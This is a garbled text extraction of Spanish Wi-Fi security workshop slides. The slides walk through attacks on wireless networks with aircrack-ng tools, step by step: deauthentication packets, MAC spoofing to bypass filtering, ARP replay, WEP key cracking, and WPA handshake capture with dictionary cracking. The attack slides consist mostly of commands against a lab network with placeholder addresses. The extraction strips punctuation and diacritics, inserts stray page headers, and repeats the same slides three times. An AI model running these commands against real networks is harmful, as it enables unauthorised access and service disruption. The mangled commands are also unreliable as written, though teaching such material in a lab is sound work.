Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 56: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 57: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 58: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

